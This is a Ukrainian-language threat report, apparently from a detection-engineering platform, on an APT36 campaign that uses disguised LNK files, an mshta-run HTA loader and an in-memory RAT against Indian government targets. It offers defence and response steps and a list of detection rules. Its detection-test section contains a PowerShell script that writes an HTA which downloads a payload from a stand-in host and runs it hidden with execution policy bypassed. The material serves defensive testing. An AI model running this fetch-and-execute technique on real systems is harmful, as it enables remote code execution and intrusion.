APT36: Багатоступенева кампанія з використанням LNK-зловмисного ПЗ, спрямована на індійські урядові організації
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
APT36 (Transparent Tribe) провела фішингову кампанію з використанням шкідливого ярлика LNK, що маскувався під PDF. Після відкриття ярлик запускає mshta.exe для виконання завантажувача на основі HTA, що дешифрує та завантажує шкідливі компоненти в пам’ять, включаючи конфігураційний модуль та DLL з усіма функціями RAT. Шкідливе ПЗ динамічно вибирає методи постійного збереження на основі встановленого продукту антивірусного захисту жертви та підключається до сервера управління через зашифрований канал. Діяльність оцінюється як зосереджена на шпигунстві, націлена на індійські урядові та освітні організації для крадіжки даних.
Розслідування
Дослідники проаналізували незвично великий файл LNK, відслідкували вбудований HTA-контент, розміщений на innlive.in, і реверсували логіку дешифрування. Ланцюг розкрив два основних етапи: десеріалізований навантажувач .NET для послаблення або обходу перевірок безпеки, а також DLL-файл без завантаження на диск (напр. ki2mtmkl.dll / iinneldc.dll), що надає функціональність RAT. Поведінку постійності зіставлено з певними антивірусними продуктами, а ключові деталі C2, такі як TCP порт 8621 та AES ключ , що використовувався для зашифрованого трафіку, були вилучені під час аналізу.
Захист
Обмежте або карантинно відправляйте ярлики (.lnk), що пришли через електронну пошту, особливо якщо вони запаковані в ZIP-архіви. Застосуйте політики контролю застосунків для обмеження виконання mshta.exe, PowerShell та інших движків сценаріїв з шляхів, доступних для запису користувача. Використовуйте виявлення кінцевих точок для процесних ланцюгів, що включають mshta.exe та індикатори виконання DLL в пам’яті, і насильно вводьте суворі засоби контролю виведення для блокування зв’язку з невідомими або недовіреними доменами.
Відповідь
Якщо виявлено підозріле виконання LNK, ізолюйте систему, зробіть знімки пам’яті та проведіть пошук індикаторів DLL в пам’яті, пов’язаних з етапом RAT. Заблокуйте ідентифіковані шкідливі домени та відповідну інфраструктуру IP і обертайте потенційно скомпрометовані облікові дані. Проведіть судово-медичну перевірку, щоб знайти артефакти постійності у папці запуску та реєстрі, видаліть їх і підтвердьте, що ніякі додаткові домівки не залишилися.
Поток атак
Детекції
Можливий Шкідливий Файл LNK з Подвійним Розширенням (через cmdline)
Переглянути
Підозріла Поведінка Уникнення Захисту LOLBAS MSHTA шляхом Виявлення Зв’язаних Команд (через process_creation)
Переглянути
Підозрілі Бінарні файли / Скрипти у Місці Автозапуску (через file_event)
Переглянути
Підозрілі Файли у Загальному Профілі Користувача (через file_event)
Переглянути
Підозріле Виконання з Загального Профілю Користувача (через process_creation)
Переглянути
IOC (SourceIP) для виявлення: APT36 : Багатоступенева Кампанія LNK для Ураження Індійських Державних Органів
Переглянути
IOC (HashSha256) для виявлення: APT36 : Багатоступенева Кампанія LNK для Ураження Індійських Державних Органів
Переглянути
IOC (DestinationIP) для виявлення: APT36 : Багатоступенева Кампанія LNK для ураження індійських державних органів
Переглянути
Виконання mshta.exe з PowerShell або CMD [Створення Процесу в Windows]
Переглянути
Виявлення Шкідливого Домену APT36 та Комунікацій C2 [Мережева З’єднання Windows]
Переглянути
Виявлення Жорстко закодованого AES ключа у Кампанії APT36 [Sysmon Windows]
Переглянути
Виконання Симуляції
Попередні вимоги: Перевірка Телеметрії та Базова Перевірка повинна бути успішною.
Мотивування: У цьому розділі детально описуються точні дії стратегії супротивника (TTP), розроблені для активації правила виявлення. Команди та наративи ПОВИННІ безпосередньо відображати визначені TTP і спрямовані на генерацію точної телеметрії, очікуваної логікою виявлення.
-
Описи Атак та Команди:
Супротивник отримав доступ з низькими привілеями через PowerShell на скомпрометованій робочій станції. Для виконання віддаленого навантаження без запису виконуваного файлу на диск, зловмисник використовуєmshta.exeдля запуску HTA-файлу, що завантажує бекдор PowerShell з сервера C2. Кроки такі:- Закодуйте мінімальний шкідливий HTA, що запускає PowerShell для завантаження та виконання навантаження.
- Розмістіть HTA на веб-сервері (наприклад,
http://attacker.local/malicious.hta). - З скомпрометованої сесії PowerShell викличте
mshta.exeз віддаленим URL-адресою як аргументом.
Цей ланцюг створює подію створення процесу , де
mshta.exeє дочірнім процесом дляpowershell.exe, точно відповідаючи правилу Sigma. -
Скрипт Регресійного Тестування:
#------------------------------------------------- # Симульований скрипт атакера – активує правило #------------------------------------------------- # 1. Визначте шкідливий HTA (вбудований для демонстраційних цілей) $htaContent = @" // Завантажити та виконати фіктивне навантаження PowerShell var url = 'http://attacker.local/payload.ps1'; var xhr = new ActiveXObject('Microsoft.XMLHTTP'); xhr.open('GET', url, false); xhr.send(); var ps = new ActiveXObject('WScript.Shell'); ps.Run('powershell -NoProfile -ExecutionPolicy Bypass -Command "' + xhr.responseText + '"', 0, false); "@ # 2. Запишіть HTA у тимчасове розташування (імітація розміщеного файлу) $tempPath = "$env:TEMPmalicious.hta" $htaContent | Set-Content -Path $tempPath -Encoding ASCII # 3. Запустіть mshta.exe з PowerShell (тригер виявлення) $mshta = (Get-Command mshta.exe).Source Write-Host "[*] Запуск mshta.exe для виконання HTA-навантаження..." Start-Process -FilePath $mshta -ArgumentList "`"$tempPath`"" -NoNewWindow # Опціонально: Сон для дозволу фіксації події Start-Sleep -Seconds 5 # Очищення (здійснюється у наступному розділі) -
Команди Очистки:
# Видалити тимчасовий файл HTA Remove-Item -Path "$env:TEMPmalicious.hta" -Force -ErrorAction SilentlyContinue # Зупинити всі залишкові процеси mshta.exe (малоймовірно після звичайного виконання) Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force Write-Host "[*] Очищення завершено."